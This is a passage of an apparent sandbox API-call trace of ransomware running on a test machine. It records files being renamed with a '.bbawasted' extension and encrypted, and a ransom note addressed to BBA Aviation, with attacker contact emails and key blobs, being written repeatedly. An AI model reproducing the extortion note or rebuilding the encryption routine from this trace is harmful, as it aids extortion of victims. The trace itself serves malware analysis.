lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0230.111] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0230.113] SetEndOfFile (hFile=0x294) returned 1 [0230.113] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0230.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0230.113] lstrcpyW (in: lpString1=0x6c4c32, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0230.113] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\ULeek VcwTN4NlzEzq.swf" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\uleek vcwtn4nlzezq.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\ULeek VcwTN4NlzEzq.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\uleek vcwtn4nlzezq.swf.bbawasted")) returned 1 [0230.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\ULeek VcwTN4NlzEzq.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\uleek vcwtn4nlzezq.swf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0230.114] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0230.114] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xf6a9 [0230.114] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf6a9) returned 0x5f0000 [0230.115] CloseHandle (hObject=0x290) returned 1 [0230.116] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0230.117] CloseHandle (hObject=0x27c) returned 1 [0230.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0230.117] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f10) returned 1 [0230.118] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0230.118] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0230.118] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6708) returned 1 [0230.118] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0230.118] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0230.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0230.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0230.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0230.130] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]oVO1xGRI1IuPgbpUNbK6eT6UOuRQshX+nKhvq8Hju8AHX04BB8oiNSkHtXEwSvC8\r\ncVpymHMiNLRZCu71tS1ezu+69GILR7Yh0uV70rqsiUHsJx2P6IKxcxC9307Sz2fY\r\nT0yPAkgL1jtH8Oa77/8JCBQdvDMfX9JvELgQy9zFeb4obASpDUTMVxlhL7xo6nuo\r\nzmZBLUvUtHqAk8k+kzpfMrPBXZ3zPz9Jk1jZpsCg0+NawrCcMYr+/Y03f5IUPjKG\r\nj6W1TCJDzMx9JXc1JGUk81L/T0fCfOFYu7CEnQGUjxdxhenUCNk8TipqZI/RzsK/\r\noMX9D1leBH5xxP4FC1UzWUjaPrQzWDVHx5Gm39ozXxxrnteuV/QjHQpcnw4ydPV+\r\nrLCePPEAt2YevCdMMHUTLksX44FF9wNbGdXnLYB5Cw11aTmN5DY+lb55PB6xbFaw\r\npUrGERvBQe7Nx1CXgQRrEltePcV3RAEvpHWIGPaZRTPJlRKhA8CJ/R2/L4uVg01u\r\nlQ893VV5wxdKoDFzMkKaTwuzajwbM2asXjTYa8IZVQUosyEdPLPNlplr0iMbqXDK\r\nUxTJ9eoLcHS1LCSQSP3yhnzibiIze/5t960brg7u+RkjfCIdy0dDm6rPMGMeBxXn\r\nu0EQgJEUTXppZ+dff5PqUuDvAklqmPilphMZLOEFEdA=[end_key]\r\nKEEP IT\r\n") returned 984 [0230.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0230.130] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0230.130] SetEndOfFile (hFile=0x294) returned 1 [0230.133] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0230.133] CloseHandle (hObject=0x294) returned 1 [0230.133] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0230.133] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae8f8 | out: hHeap=0x660000) returned 1 [0230.133] _aulldvrm () returned 0x0 [0230.133] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a68a0) returned 1 [0230.134] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0230.134] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0230.134] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\vZQIqM2i2F.swf") returned 71 [0230.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x298) returned 0x6c4b88 [0230.134] lstrcpyW (in: lpString1=0x6c4c16, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0230.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0230.134] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6818) returned 1 [0230.135] CryptGenRandom (in: hProv=0x6a6818, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0230.135] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0230.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\vZQIqM2i2F.swf.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\vzqiqm2i2f.swf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0230.292] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0230.293] SetEndOfFile (hFile=0x294) returned 1 [0230.294] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0230.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0230.294] lstrcpyW (in: lpString1=0x6c4c16, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0230.294] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\vZQIqM2i2F.swf" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\vzqiqm2i2f.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\vZQIqM2i2F.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\vzqiqm2i2f.swf.bbawasted")) returned 1 [0230.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\vZQIqM2i2F.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\vzqiqm2i2f.swf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0230.295] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0230.295] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xe4a8 [0230.295] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe4a8) returned 0x5f0000 [0230.295] CloseHandle (hObject=0x27c) returned 1 [0230.297] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0230.298] CloseHandle (hObject=0x290) returned 1 [0230.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0230.298] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6928) returned 1 [0230.299] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0230.299] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0230.299] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6790) returned 1 [0230.300] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0230.300] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0230.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0230.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0230.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0230.313] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]E5ECpIf3HX+9RQHVBwl51ata0jIgrve5WTq9bsYlmRWeF6fNIyZ2rtqslAPjv4J2\r\nvbUiqkjm4rWRhN9RR6KPVJQsb7qebXH4nX7nm9Xx5d8rkFa/nghUDMLI855GPBiW\r\nLCaiKW59v+G3jiGA4nejH8UWwU6KiKFPqI8cfGXcxWWXy69I2JKUTkhCsAQ/T0bt\r\nAIY+nQ0sH7ANIYRJ4w6vXsry4rQcZhYWtsrIkw6GzQ7GsLqLg+V1Jb13Pr4YhZIh\r\n/L2PE1jrGwi/VA43/mktl6UZa6jSbjnNgjbFCgfVvveM2V+tgTQ2xI7dPkug+Mnp\r\nVibWGceB0e7e0UJZSjT2NgBSr3pXv9LOsGVN1XeBJ9QHC7Fxty35sY3smaTZtRfr\r\n2EtJnv/HzQqCsjQyOKaV31u5KNDcvLOlZGNWNz/umloYQDAbazuYhDx8E727xHTZ\r\nAAhyKe2Dn11HwRk9CRYZKU8Kr6+4kIAUbhvKMJu5HYnL2TN7VEArZgOoJgjq9tfu\r\n774lKcwrjM+nxcCo2gXboYu3YrFsSDUYJOAmsDFhM7q9r9O1vX650HT9rfMtCmCV\r\nSubEcTfZitrdLQKUpmXPys2p6A6EcksgFOtEm8SJUohNG4h3Htq5r83pMJS3glaQ\r\nedEURd0//petJJE3iSSZugy91gV7YJm3NOQR0fnZWcT=[end_key]\r\nKEEP IT\r\n") returned 984 [0230.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0230.313] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0230.313] SetEndOfFile (hFile=0x294) returned 1 [0230.315] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0230.315] CloseHandle (hObject=0x294) returned 1 [0230.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0230.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ba7f0 | out: hHeap=0x660000) returned 1 [0230.316] _aulldvrm () returned 0x0 [0230.316] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5f98) returned 1 [0230.317] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0230.317] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0230.317] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\lFu1817SMNIgNV-.mkv") returned 56 [0230.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0230.317] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0230.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0230.317] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6818) returned 1 [0230.317] CryptGenRandom (in: hProv=0x6a6818, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0230.317] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0230.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\lFu1817SMNIgNV-.mkv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\lfu1817smnignv-.mkv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0230.320] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0230.321] SetEndOfFile (hFile=0x294) returned 1 [0230.321] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0230.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0230.321] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0230.321] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\lFu1817SMNIgNV-.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\lfu1817smnignv-.mkv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\lFu1817SMNIgNV-.mkv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\lfu1817smnignv-.mkv.bbawasted")) returned 1 [0230.322] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\lFu1817SMNIgNV-.mkv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\lfu1817smnignv-.mkv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0230.322] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0230.323] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x313a [0230.323] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x313a) returned 0x5f0000 [0230.323] CloseHandle (hObject=0x290) returned 1 [0230.324] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0230.324] CloseHandle (hObject=0x27c) returned 1 [0230.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0230.324] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f10) returned 1 [0230.325] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0230.325] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0230.325] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a63d8) returned 1 [0230.325] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0230.325] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0230.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0230.334] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0230.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0230.334] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]q04F6H+e7JKQisLPRLrPcgp901houEJB+81N6ULHQrwf/P3ahu6BJbUunip6wNnb\r\nP4hYnRcy0swOo+IBt4mC+WjEVx1Iknu47dnFs3JYj+x3LTjy60QNqUZW9gfWkQFI\r\n1Z0hYjSwVDlxS0+b+CMEw4Eu/+vol1e8co5DFoLegdJv93J5tgkCv9zXosjh/DXM\r\nhST1mldJY7SpSQsMbQ7CAKJhuD2aIGpn1gCkVdkG4LPtjt6fyYdh9t0/W9ZDciLx\r\nA+QHKSIMP7SJ4UdVQvGvNbJGDyB6wN+fLQhZ2sAS6t9rZEsInNLa9IMCmYlrdQyM\r\n075dr1N6S+CPRLkIZelgEzZdcURtve348jXHu/bGK/ZHAcFBgKj2is8hetk89LUj\r\n/IIATfdQtTggRF373+9AwShMoYZ0Ol3y97EjyyA9mFLVkaIPH3OvTXcsg6era8HN\r\nEcv3PK8eX/6yexL1OZp0VfWjzMmGvoja6zFOa7byMnPuChVX5UNsBLfuPm/yKcYb\r\noQb+AH2ESONilafsj606x4xh7rWL6/2X/LvxgCKn+arizT2dSZKrqqjThWOoRjQv\r\nu08dVSjVvu2dGn3TWgDT1tVwduT4Ha6pS0KdvejACy3Vkt6/mqZOf1O2t2rahJzn\r\nza48FdjCqt7PDfvzD9qcKZMe5zsm5l4IieuwU8I74wg=[end_key]\r\nKEEP IT\r\n") returned 984 [0230.334] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0230.334] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0230.334] SetEndOfFile (hFile=0x294) returned 1 [0230.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0230.337] CloseHandle (hObject=0x294) returned 1 [0230.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0230.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aae68 | out: hHeap=0x660000) returned 1 [0230.337] _aulldvrm () returned 0x0 [0230.337] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6818) returned 1 [0230.338] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0230.338] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0230.338] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\Pok9zDFN0qtwWcuVZBIP.mp4") returned 61 [0230.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x284) returned 0x6c4b88 [0230.338] lstrcpyW (in: lpString1=0x6c4c02, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0230.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0230.338] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6928) returned 1 [0230.338] CryptGenRandom (in: hProv=0x6a6928, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0230.338] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0230.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\Pok9zDFN0qtwWcuVZBIP.mp4.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\pok9zdfn0qtwwcuvzbip.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0230.513] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0230.514] SetEndOfFile (hFile=0x27c) returned 1 [0230.514] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0230.515] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0230.515] lstrcpyW (in: lpString1=0x6c4c02, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0230.515] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\Pok9zDFN0qtwWcuVZBIP.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\pok9zdfn0qtwwcuvzbip.mp4"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\Pok9zDFN0qtwWcuVZBIP.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\pok9zdfn0qtwwcuvzbip.mp4.bbawasted")) returned 1 [0230.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\Pok9zDFN0qtwWcuVZBIP.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\pok9zdfn0qtwwcuvzbip.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 